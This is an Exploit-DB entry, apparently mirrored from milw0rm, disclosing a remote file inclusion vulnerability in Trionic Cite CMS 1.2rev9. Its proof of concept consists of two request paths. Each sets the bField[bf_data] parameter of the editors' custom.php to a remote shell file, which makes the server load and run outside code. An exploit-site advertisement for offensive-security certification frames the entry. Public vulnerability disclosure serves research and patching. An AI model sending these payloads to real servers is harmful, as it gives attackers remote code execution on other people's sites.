Trionic Cite CMS 1.2rev9 - Remote File Inclusion

EDB-ID:

4485


Author:

GoLd_M

Type:

webapps


Platform:

PHP

Date:

2007-10-05


Become a Certified Penetration Tester

Enroll in Advanced Web Attacks and Exploitation , the course required to become an Offensive Security Web Expert (OSWE)

GET CERTIFIED

# Trionic Cite CMS 1.2 rev9 Remote File Inclusion Vulnerabilities
# D.S : http://sourceforge.net/project/showfiles.php?group_id=177347
# POC :
# /[PHAT]/interface/editors/-custom.php?bField[bf_data]=http://localhost/shell.txt
# /[PHAT]/interface/editors/custom.php?bField[bf_data]=http://localhost/shell.txt

# milw0rm.com [2007-10-05]